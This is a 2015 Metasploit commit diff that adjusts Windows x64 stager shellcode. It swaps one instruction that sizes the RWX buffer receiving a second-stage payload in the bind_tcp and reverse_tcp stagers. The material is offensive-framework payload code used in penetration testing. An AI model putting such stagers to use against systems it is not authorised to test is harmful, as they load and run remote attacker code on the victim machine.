Fix rapid7#5988, windows x64 stagers

jvazquez-r7 · jvazquez-r7 · commit 9444c8c41065 · 2015-09-28T15:52:50.000-05:00
* Also, use mov esi, esi to save an extra byte
* Also, modify the block_recv.asm code, just to have it up to date
diff --git a/external/source/shellcode/windows/x64/src/block/block_recv.asm b/external/source/shellcode/windows/x64/src/block/block_recv.asm
@@ -24,6 +24,7 @@ recv:
   add rsp, 32            ; we restore RSP from the api_call so we can pop off RSI next
   ; Alloc a RWX buffer for the second stage
   pop rsi                ; pop off the second stage length
+  mov esi, esi           ; only use the lower-order 32 bits for the size
   push byte 0x40         ; 
   pop r9                 ; PAGE_EXECUTE_READWRITE
   push 0x1000            ; 
diff --git a/lib/msf/core/payload/windows/x64/bind_tcp.rb b/lib/msf/core/payload/windows/x64/bind_tcp.rb
@@ -220,6 +220,7 @@ def asm_bind_tcp(opts={})
 
         ; Alloc a RWX buffer for the second stage
         pop rsi                ; pop off the second stage length
+        mov esi, esi           ; only use the lower-order 32 bits for the size
         push 0x40              ; 
         pop r9                 ; PAGE_EXECUTE_READWRITE
         push 0x1000            ; 
diff --git a/lib/msf/core/payload/windows/x64/reverse_tcp.rb b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
@@ -219,7 +219,7 @@ def asm_reverse_tcp(opts={})
 
       ; Alloc a RWX buffer for the second stage
         pop rsi                 ; pop off the second stage length
-        movsxd rsi, esi         ; only use the lower-order 32 bits for the size
+        mov esi, esi            ; only use the lower-order 32 bits for the size
         push 0x40               ; 
         pop r9                  ; PAGE_EXECUTE_READWRITE
         push 0x1000             ; 
